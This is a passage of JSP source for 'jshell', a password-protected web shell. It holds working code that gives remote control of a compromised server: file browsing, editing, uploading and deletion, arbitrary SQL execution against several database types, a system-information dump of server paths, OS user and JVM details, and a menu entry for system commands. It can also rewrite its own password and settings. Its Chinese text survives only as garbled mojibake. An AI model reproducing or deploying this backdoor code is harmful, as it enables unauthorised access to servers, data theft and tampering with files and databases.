|
||
|
||
path = pathConvert(path);
|
||
file2Rename = pathConvert(file2Rename);
|
||
|
||
try {
|
||
File file = new File(file2Rename);
|
||
|
||
newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName;
|
||
File newFile = new File(newName);
|
||
|
||
if (! file.exists()) {
|
||
sRet = "<font color=\"red\"><3E>ļ<EFBFBD>\"" + file2Rename + "\"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD></font>";
|
||
} else {
|
||
file.renameTo(newFile);
|
||
sRet = "<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڷ<EFBFBD><DAB7>أ<EFBFBD><D8A3><EFBFBD><EFBFBD>Ժ<D4BA>";
|
||
sRet += "<meta http-equiv=\"refresh\" content=\"2;url=" + curUri + "&curPath=" + path + "\" />";
|
||
}
|
||
} catch (SecurityException e) {
|
||
sRet = "<font color=\"red\"><3E><>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD><E2B5BC><EFBFBD>ļ<EFBFBD>\"" + file2Rename + "\"<22><><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7></font>";
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) {
|
||
boolean bRet = true;
|
||
String driverName = "";
|
||
|
||
if (dbServer.equals(""))
|
||
dbServer = "localhost";
|
||
|
||
try {
|
||
if (dbType.equals("sqlserver")) {
|
||
driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
|
||
if (dbPort.equals(""))
|
||
dbPort = "1433";
|
||
_url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
|
||
} else if (dbType.equals("mysql")) {
|
||
driverName = "com.mysql.jdbc.Driver";
|
||
if (dbPort.equals(""))
|
||
dbPort = "3306";
|
||
_url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName;
|
||
} else if (dbType.equals("odbc")) {
|
||
driverName = "sun.jdbc.odbc.JdbcOdbcDriver";
|
||
_url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword;
|
||
} else if (dbType.equals("oracle")) {
|
||
driverName = "oracle.jdbc.driver.OracleDriver";
|
||
_url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName;
|
||
} else if (dbType.equals("db2")) {
|
||
driverName = "com.ibm.db2.jdbc.app.DB2Driver";
|
||
_url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName;
|
||
}
|
||
|
||
Class.forName(driverName);
|
||
} catch (ClassNotFoundException e) {
|
||
bRet = false;
|
||
}
|
||
|
||
return bRet;
|
||
}
|
||
|
||
public boolean DBConnect(String User, String Password) {
|
||
boolean bRet = false;
|
||
|
||
if (_url != null) {
|
||
try {
|
||
_dbConnection = DriverManager.getConnection(_url, User, Password);
|
||
_dbStatement = _dbConnection.createStatement();
|
||
bRet = true;
|
||
} catch (SQLException e) {
|
||
bRet = false;
|
||
}
|
||
}
|
||
|
||
return bRet;
|
||
}
|
||
|
||
public String DBExecute(String sql) {
|
||
String sRet = "";
|
||
|
||
if (_dbConnection == null || _dbStatement == null) {
|
||
sRet = "<font color=\"red\"><3E><><EFBFBD>ݿ<EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></font>";
|
||
} else {
|
||
try {
|
||
if (sql.toLowerCase().substring(0, 6).equals("select")) {
|
||
ResultSet rs = _dbStatement.executeQuery(sql);
|
||
ResultSetMetaData rsmd = rs.getMetaData();
|
||
int colNum = rsmd.getColumnCount();
|
||
int colType;
|
||
|
||
sRet = "sql<71><6C><EFBFBD><EFBFBD>ִ<EFBFBD>гɹ<D0B3><C9B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ؽ<EFBFBD><D8BD><EFBFBD><br>\n";
|
||
sRet += "<table align=\"center\" border=\"0\" bgcolor=\"#CCCCCC\" cellpadding=\"2\" cellspacing=\"1\">\n";
|
||
sRet += " <tr bgcolor=\"#FFFFFF\">\n";
|
||
for (int i = 1; i <= colNum; i ++) {
|
||
sRet += " <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\n";
|
||
}
|
||
sRet += " </tr>\n";
|
||
while (rs.next()) {
|
||
sRet += " <tr bgcolor=\"#FFFFFF\">\n";
|
||
for (int i = 1; i <= colNum; i ++) {
|
||
colType = rsmd.getColumnType(i);
|
||
|
||
sRet += " <td>";
|
||
switch (colType) {
|
||
case Types.BIGINT:
|
||
sRet += rs.getLong(i);
|
||
break;
|
||
|
||
case Types.BIT:
|
||
sRet += rs.getBoolean(i);
|
||
break;
|
||
|
||
case Types.BOOLEAN:
|
||
sRet += rs.getBoolean(i);
|
||
break;
|
||
|
||
case Types.CHAR:
|
||
sRet += rs.getString(i);
|
||
break;
|
||
|
||
case Types.DATE:
|
||
sRet += rs.getDate(i).toString();
|
||
break;
|
||
|
||
case Types.DECIMAL:
|
||
sRet += rs.getDouble(i);
|
||
break;
|
||
|
||
case Types.NUMERIC:
|
||
sRet += rs.getDouble(i);
|
||
break;
|
||
|
||
case Types.REAL:
|
||
sRet += rs.getDouble(i);
|
||
break;
|
||
|
||
case Types.DOUBLE:
|
||
sRet += rs.getDouble(i);
|
||
break;
|
||
|
||
case Types.FLOAT:
|
||
sRet += rs.getFloat(i);
|
||
break;
|
||
|
||
case Types.INTEGER:
|
||
sRet += rs.getInt(i);
|
||
break;
|
||
|
||
case Types.TINYINT:
|
||
sRet += rs.getShort(i);
|
||
break;
|
||
|
||
case Types.VARCHAR:
|
||
sRet += rs.getString(i);
|
||
break;
|
||
|
||
case Types.TIME:
|
||
sRet += rs.getTime(i).toString();
|
||
break;
|
||
|
||
case Types.DATALINK:
|
||
sRet += rs.getTimestamp(i).toString();
|
||
break;
|
||
}
|
||
sRet += " </td>\n";
|
||
}
|
||
sRet += " </tr>\n";
|
||
}
|
||
sRet += "</table>\n";
|
||
|
||
rs.close();
|
||
} else {
|
||
if (_dbStatement.execute(sql)) {
|
||
sRet = "sql<71><6C><EFBFBD><EFBFBD>ִ<EFBFBD>гɹ<D0B3>";
|
||
} else {
|
||
sRet = "<font color=\"red\">sql<71><6C><EFBFBD><EFBFBD>ִ<EFBFBD><D6B4>ʧ<EFBFBD><CAA7></font>";
|
||
}
|
||
}
|
||
} catch (SQLException e) {
|
||
sRet = "<font color=\"red\">sql<71><6C><EFBFBD><EFBFBD>ִ<EFBFBD><D6B4>ʧ<EFBFBD><CAA7></font>";
|
||
}
|
||
}
|
||
|
||
return sRet;
|
||
}
|
||
|
||
public void DBRelease() {
|
||
try {
|
||
if (_dbStatement != null) {
|
||
_dbStatement.close();
|
||
_dbStatement = null;
|
||
}
|
||
|
||
if (_dbConnection != null) {
|
||
_dbConnection.close();
|
||
_dbConnection = null;
|
||
}
|
||
} catch (SQLException e) {
|
||
|
||
}
|
||
}
|
||
|
||
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
||
class JshellConfig {
|
||
private String _jshellContent = null;
|
||
private String _path = null;
|
||
|
||
public JshellConfig(String path) throws JshellConfigException {
|
||
_path = path;
|
||
read();
|
||
}
|
||
|
||
private void read() throws JshellConfigException {
|
||
try {
|
||
FileReader jshell = new FileReader(new File(_path));
|
||
char[] buffer = new char[1024];
|
||
int nChars;
|
||
_jshellContent = "";
|
||
|
||
while ((nChars = jshell.read(buffer, 0, 1024)) != -1) {
|
||
_jshellContent += new String(buffer, 0, nChars);
|
||
}
|
||
|
||
jshell.close();
|
||
} catch (IOException e) {
|
||
throw new JshellConfigException("<22><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>ʧ<EFBFBD><CAA7>");
|
||
}
|
||
}
|
||
|
||
public void save() throws JshellConfigException {
|
||
FileWriter jshell = null;
|
||
|
||
try {
|
||
jshell = new FileWriter(new File(_path));
|
||
char[] buffer = _jshellContent.toCharArray();
|
||
int start = 0;
|
||
int size = 1024;
|
||
|
||
for (start = 0; start < buffer.length - 1 - size; start += size) {
|
||
jshell.write(buffer, start, size);
|
||
}
|
||
|
||
jshell.write(buffer, start, buffer.length - 1 - start);
|
||
} catch (IOException e) {
|
||
new JshellConfigException("д<>ļ<EFBFBD>ʧ<EFBFBD><CAA7>");
|
||
} finally {
|
||
try {
|
||
jshell.close();
|
||
} catch (IOException e) {
|
||
|
||
}
|
||
}
|
||
}
|
||
|
||
public void setPassword(String password) throws JshellConfigException {
|
||
Pattern p = Pattern.compile("\\w+");
|
||
Matcher m = p.matcher(password);
|
||
|
||
if (! m.matches()) {
|
||
throw new JshellConfigException("<22><><EFBFBD>벻<EFBFBD><EBB2BB><EFBFBD>г<EFBFBD><D0B3><EFBFBD>ĸ<EFBFBD><C4B8><EFBFBD><EFBFBD><EFBFBD>»<EFBFBD><C2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD>");
|
||
}
|
||
|
||
p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\"");
|
||
m = p.matcher(_jshellContent);
|
||
if (! m.find()) {
|
||
throw new JshellConfigException("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD>");
|
||
}
|
||
|
||
_jshellContent = m.replaceAll("private String _password = \"" + password + "\"");
|
||
|
||
//return HTMLEncode(_jshellContent);
|
||
}
|
||
|
||
public void setEncodeType(String encodeType) throws JshellConfigException {
|
||
Pattern p = Pattern.compile("[A-Za-z0-9]+");
|
||
Matcher m = p.matcher(encodeType);
|
||
|
||
if (! m.matches()) {
|
||
throw new JshellConfigException("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽֻ<CABD><D6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ĸ<EFBFBD><C4B8><EFBFBD><EFBFBD><EFBFBD>ֵ<EFBFBD><D6B5><EFBFBD><EFBFBD><EFBFBD>");
|
||
}
|
||
|
||
p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\"");
|
||
m = p.matcher(_jshellContent);
|
||
|
||
if (! m.find()) {
|
||
throw new JshellConfigException("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD>");
|
||
}
|
||
|
||
_jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\"");
|
||
//return HTMLEncode(_jshellContent);
|
||
}
|
||
|
||
public void setSessionTime(String sessionTime) throws JshellConfigException {
|
||
Pattern p = Pattern.compile("\\d+");
|
||
Matcher m = p.matcher(sessionTime);
|
||
|
||
if (! m.matches()) {
|
||
throw new JshellConfigException("session<6F><6E>ʱʱ<CAB1><CAB1>ֻ<EFBFBD><D6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
|
||
}
|
||
|
||
p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime);
|
||
m = p.matcher(_jshellContent);
|
||
|
||
if (! m.find()) {
|
||
throw new JshellConfigException("<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD>");
|
||
}
|
||
|
||
_jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime);
|
||
//return HTMLEncode(_jshellContent);
|
||
}
|
||
|
||
public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException {
|
||
Pattern p = Pattern.compile("\\w+");
|
||
Matcher m = null;
|
||
int i;
|
||
String fileTypes = "";
|
||
String tmpFileTypes = "";
|
||
|
||
for (i = 0; i < textFileTypes.length; i ++) {
|
||
m = p.matcher(textFileTypes[i]);
|
||
|
||
if (! m.matches()) {
|
||
throw new JshellConfigException("<22><>չ<EFBFBD><D5B9>ֻ<EFBFBD><D6BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ĸ<EFBFBD><C4B8><EFBFBD>ֺ<EFBFBD><D6BA>»<EFBFBD><C2BB>ߵ<EFBFBD><DFB5><EFBFBD><EFBFBD><EFBFBD>");
|
||
}
|
||
|
||
if (i != textFileTypes.length - 1)
|
||
fileTypes += "\"" + textFileTypes[i] + "\"" + ", ";
|
||
else
|
||
fileTypes += "\"" + textFileTypes[i] + "\"";
|
||
}
|
||
|
||
for (i = 0; i < _textFileTypes.length; i ++) {
|
||
if (i != _textFileTypes.length - 1)
|
||
tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", ";
|
||
else
|
||
tmpFileTypes += "\"" + _textFileTypes[i] + "\"";
|
||
}
|
||
|
||
p = Pattern.compile(tmpFileTypes);
|
||
m = p.matcher(_jshellContent);
|
||
|
||
if (! m.find()) {
|
||
throw new JshellConfigException("<22><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC>Ѿ<EFBFBD><D1BE><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD>");
|
||
}
|
||
|
||
_jshellContent = m.replaceAll(fileTypes);
|
||
|
||
//return HTMLEncode(_jshellContent);
|
||
}
|
||
|
||
public String getContent() {
|
||
return HTMLEncode(_jshellContent);
|
||
}
|
||
}
|
||
|
||
class JshellConfigException extends Exception {
|
||
public JshellConfigException(String message) {
|
||
super(message);
|
||
}
|
||
}
|
||
%>
|
||
<html>
|
||
<head>
|
||
<title>jshell ver 0.1</title>
|
||
</head>
|
||
<style>
|
||
body {
|
||
font-size: 14px;
|
||
font-family: <20><><EFBFBD><EFBFBD>;
|
||
}
|
||
td {
|
||
font-size: 14px;
|
||
font-family: <20><><EFBFBD><EFBFBD>;
|
||
}
|
||
|
||
input.textbox {
|
||
border: black solid 1;
|
||
font-size: 12px;
|
||
height: 18px;
|
||
}
|
||
|
||
input.button {
|
||
font-size: 12px;
|
||
font-family: <20><><EFBFBD><EFBFBD>;
|
||
border: black solid 1;
|
||
}
|
||
|
||
td.datarows {
|
||
font-size: 14px;
|
||
font-family: <20><><EFBFBD><EFBFBD>;
|
||
height: 25px;
|
||
}
|
||
|
||
textarea {
|
||
border: black solid 1;
|
||
}
|
||
</style>
|
||
<script language="JavaScript">
|
||
<!--
|
||
function ltrim(str) {
|
||
while (str.indexOf(0) == " ")
|
||
str = str.substring(1);
|
||
|
||
return str;
|
||
}
|
||
|
||
function changeAction(obj) {
|
||
obj.submit();
|
||
}
|
||
//-->
|
||
</script>
|
||
<body>
|
||
<%
|
||
session.setMaxInactiveInterval(_sessionOutTime * 60);
|
||
|
||
if (request.getParameter("password") == null && session.getAttribute("password") == null) {
|
||
// show the login form
|
||
//================================================================================================
|
||
%>
|
||
<table align="center" border="0" width="250" cellspacing="2" cellpadding="1">
|
||
<form name="f1" method="post">
|
||
<tr>
|
||
<td align="center" colspan="2"><b>JShell Ver 1.0</b></td>
|
||
</tr>
|
||
<tr>
|
||
<td><3E><><EFBFBD><EFBFBD>:</td>
|
||
<td>
|
||
<input type="password" size="25" name="password" class="textbox" />
|
||
<input type="submit" value="<22>ύ" class="button" />
|
||
</td>
|
||
</tr>
|
||
</form>
|
||
</table>
|
||
<%
|
||
//================================================================================================
|
||
// end of the login form
|
||
} else {
|
||
String password = null;
|
||
|
||
if (session.getAttribute("password") == null) {
|
||
password = (String)request.getParameter("password");
|
||
|
||
if (validate(password) == false) {
|
||
out.println("<div align=\"center\"><font color=\"red\"><li><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!</font></div>");
|
||
out.close();
|
||
return;
|
||
}
|
||
|
||
session.setAttribute("password", password);
|
||
} else {
|
||
password = (String)session.getAttribute("password");
|
||
}
|
||
|
||
String action = null;
|
||
|
||
if (request.getParameter("action") == null)
|
||
action = "main";
|
||
else
|
||
action = (String)request.getParameter("action");
|
||
|
||
if (action.equals("exit")) {
|
||
session.removeAttribute("password");
|
||
response.sendRedirect(request.getRequestURI());
|
||
out.close();
|
||
return;
|
||
}
|
||
|
||
// show the main menu
|
||
//====================================================================================
|
||
%>
|
||
<table align="center" width="600" border="0" cellpadding="2" cellspacing="0">
|
||
<form name="form1" method="get">
|
||
<tr bgcolor="#CCCCCC">
|
||
<td id="title"><!--[<5B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ҳ]--></td>
|
||
<td align="right">
|
||
<select name="action" onChange="javascript:changeAction(document.form1)">
|
||
<option value="main"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ҳ</option>
|
||
<option value="filesystem"><3E>ļ<EFBFBD>ϵͳ</option>
|
||
<option value="command">ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD></option>
|
||
<option value="database"><3E><><EFBFBD>ݿ<EFBFBD></option>
|
||
<option value="config"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></option>
|
||
<option value="about"><3E><><EFBFBD>ڳ<EFBFBD><DAB3><EFBFBD></option>
|
||
<option value="exit"><3E>˳<EFBFBD><CBB3><EFBFBD><EFBFBD><EFBFBD></option>
|
||
</select>
|
||
<script language="JavaScript">
|
||
<%
|
||
out.println("var action = \"" + action + "\"");
|
||
%>
|
||
var sAction = document.form1.action;
|
||
for (var i = 0; i < sAction.length; i ++) {
|
||
if (sAction[i].value == action) {
|
||
sAction[i].selected = true;
|
||
//title.innerHTML = "[" + sAction[i].innerHTML + "]";
|
||
}
|
||
}
|
||
</script>
|
||
</td>
|
||
</tr>
|
||
</form>
|
||
</table>
|
||
<%
|
||
//=====================================================================================
|
||
// end of main menu
|
||
|
||
if (action.equals("main")) {
|
||
// print the system info table
|
||
//=======================================================================================
|
||
%>
|
||
<table align="center" width="600" cellpadding="2" cellspacing="1" border="0" bgcolor="#CCCCCC">
|
||
<tr bgcolor="#FFFFFF">
|
||
<td colspan="2" align="center"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ</td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
|
||
<td align="center" class="datarows"><%=request.getServerName()%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD></td>
|
||
<td align="center" class="datarows"><%=request.getServerPort()%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><><EFBFBD><EFBFBD>ϵͳ</td>
|
||
<td align="center" class="datarows"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><>ǰ<EFBFBD>û<EFBFBD><C3BB><EFBFBD></td>
|
||
<td align="center" class="datarows"><%=System.getProperty("user.name")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><>ǰ<EFBFBD>û<EFBFBD>Ŀ¼</td>
|
||
<td align="center" class="datarows"><%=System.getProperty("user.home")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><>ǰ<EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD>Ŀ¼</td>
|
||
<td align="center" class="datarows"><%=System.getProperty("user.dir")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7></td>
|
||
<td align="center" class="datarows"><%=request.getRequestURI()%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7></td>
|
||
<td align="center" class="datarows"><%=request.getRealPath(request.getServletPath())%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><><EFBFBD><EFBFBD>Э<EFBFBD><D0AD></td>
|
||
<td align="center" class="datarows"><%=request.getProtocol()%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>汾<EFBFBD><E6B1BE>Ϣ</td>
|
||
<td align="center" class="datarows"><%=application.getServerInfo()%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows">JDK<44>汾</td>
|
||
<td align="center" class="datarows"><%=System.getProperty("java.version")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows">JDK<44><4B>װ·<D7B0><C2B7></td>
|
||
<td align="center" class="datarows"><%=System.getProperty("java.home")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows">JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>汾</td>
|
||
<td align="center" class="datarows"><%=System.getProperty("java.vm.specification.version")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows">JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
|
||
<td align="center" class="datarows"><%=System.getProperty("java.vm.name")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows">JAVA<56><41>·<EFBFBD><C2B7></td>
|
||
<td align="center" class="datarows"><%=System.getProperty("java.class.path")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows">JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7></td>
|
||
<td align="center" class="datarows"><%=System.getProperty("java.library.path")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows">JAVA<56><41>ʱĿ¼</td>
|
||
<td align="center" class="datarows"><%=System.getProperty("java.io.tmpdir")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows">JIT<49><54><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
|
||
<td align="center" class="datarows"><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><>չĿ¼·<C2BC><C2B7></td>
|
||
<td align="center" class="datarows"><%=System.getProperty("java.ext.dirs")%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td colspan="2" align="center"><3E>ͻ<EFBFBD><CDBB><EFBFBD><EFBFBD><EFBFBD>Ϣ</td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E>ͻ<EFBFBD><CDBB><EFBFBD><EFBFBD><EFBFBD>ַ</td>
|
||
<td align="center" class="datarows"><%=request.getRemoteAddr()%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
|
||
<td align="center" class="datarows"><%=request.getRemoteHost()%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E>û<EFBFBD><C3BB><EFBFBD></td>
|
||
<td align="center" class="datarows"><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows"><3E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽ</td>
|
||
<td align="center" class="datarows"><%=request.getScheme()%></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center" class="datarows">Ӧ<>ð<EFBFBD>ȫ<EFBFBD><EFBFBD><D7BD>ֲ<EFBFBD></td>
|
||
<td align="center" class="datarows"><%=request.isSecure() == true ? "<22><>" : "<22><>"%></td>
|
||
</tr>
|
||
</table>
|
||
<%
|
||
//=======================================================================================
|
||
// end of printing the system info table
|
||
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||
} else if (action.equals("filesystem")) {
|
||
String curPath = "";
|
||
String result = "";
|
||
String fsAction = "";
|
||
|
||
if (request.getParameter("curPath") == null) {
|
||
curPath = request.getRealPath(request.getServletPath());
|
||
curPath = pathConvert((new File(curPath)).getParent());
|
||
} else {
|
||
curPath = Unicode2GB((String)request.getParameter("curPath"));
|
||
}
|
||
|
||
if (request.getParameter("fsAction") == null) {
|
||
fsAction = "list";
|
||
} else {
|
||
fsAction = (String)request.getParameter("fsAction");
|
||
}
|
||
|
||
if (fsAction.equals("list"))
|
||
result = listFiles(curPath, request.getRequestURI() + "?action=" + action);
|
||
else if (fsAction.equals("browse")) {
|
||
result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action);
|
||
result += browseFile(curPath);
|
||
}
|
||
else if (fsAction.equals("open"))
|
||
result = openFile(curPath, request.getRequestURI() + "?action=" + action);
|
||
else if (fsAction.equals("save")) {
|
||
if (request.getParameter("fileContent") == null) {
|
||
result = "<font color=\"red\">ҳ<>浼<EFBFBD><E6B5BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD></font>";
|
||
} else {
|
||
String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
|
||
result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent);
|
||
}
|
||
} else if (fsAction.equals("createFolder")) {
|
||
if (request.getParameter("folderName") == null) {
|
||
result = "<font color=\"red\">Ŀ¼<C4BF><C2BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA></font>";
|
||
} else {
|
||
String folderName = Unicode2GB(request.getParameter("folderName").trim());
|
||
if (folderName.equals("")) {
|
||
result = "<font color=\"red\">Ŀ¼<C4BF><C2BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA></font>";
|
||
} else {
|
||
result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName);
|
||
}
|
||
}
|
||
} else if (fsAction.equals("createFile")) {
|
||
if (request.getParameter("fileName") == null) {
|
||
result = "<font color=\"red\"><3E>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA></font>";
|
||
} else {
|
||
String fileName = Unicode2GB(request.getParameter("fileName").trim());
|
||
if (fileName.equals("")) {
|
||
result = "<font color=\"red\"><3E>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA></font>";
|
||
} else {
|
||
result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName);
|
||
}
|
||
}
|
||
} else if (fsAction.equals("deleteFile")) {
|
||
if (request.getParameter("filesDelete") == null) {
|
||
result = "<font color=\"red\">û<><C3BB>ѡ<EFBFBD><D1A1>Ҫɾ<D2AA><C9BE><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></font>";
|
||
} else {
|
||
String[] files2Delete = (String[])request.getParameterValues("filesDelete");
|
||
if (files2Delete.length == 0) {
|
||
result = "<font color=\"red\">û<><C3BB>ѡ<EFBFBD><D1A1>Ҫɾ<D2AA><C9BE><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></font>";
|
||
} else {
|
||
for (int n = 0; n < files2Delete.length; n ++) {
|
||
files2Delete[n] = Unicode2GB(files2Delete[n]);
|
||
}
|
||
result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete);
|
||
}
|
||
}
|
||
} else if (fsAction.equals("saveAs")) {
|
||
if (request.getParameter("fileContent") == null) {
|
||
result = "<font color=\"red\">ҳ<>浼<EFBFBD><E6B5BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD></font>";
|
||
} else {
|
||
String fileContent = Unicode2GB(request.getParameter("fileContent"));
|
||
result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent);
|
||
}
|
||
} else if (fsAction.equals("upload")) {
|
||
result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
|
||
} else if (fsAction.equals("copyto")) {
|
||
if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) {
|
||
result = "<font color=\"red\">û<><C3BB>ѡ<EFBFBD><D1A1>Ҫ<EFBFBD><D2AA><EFBFBD>Ƶ<EFBFBD><C6B5>ļ<EFBFBD></font>";
|
||
} else {
|
||
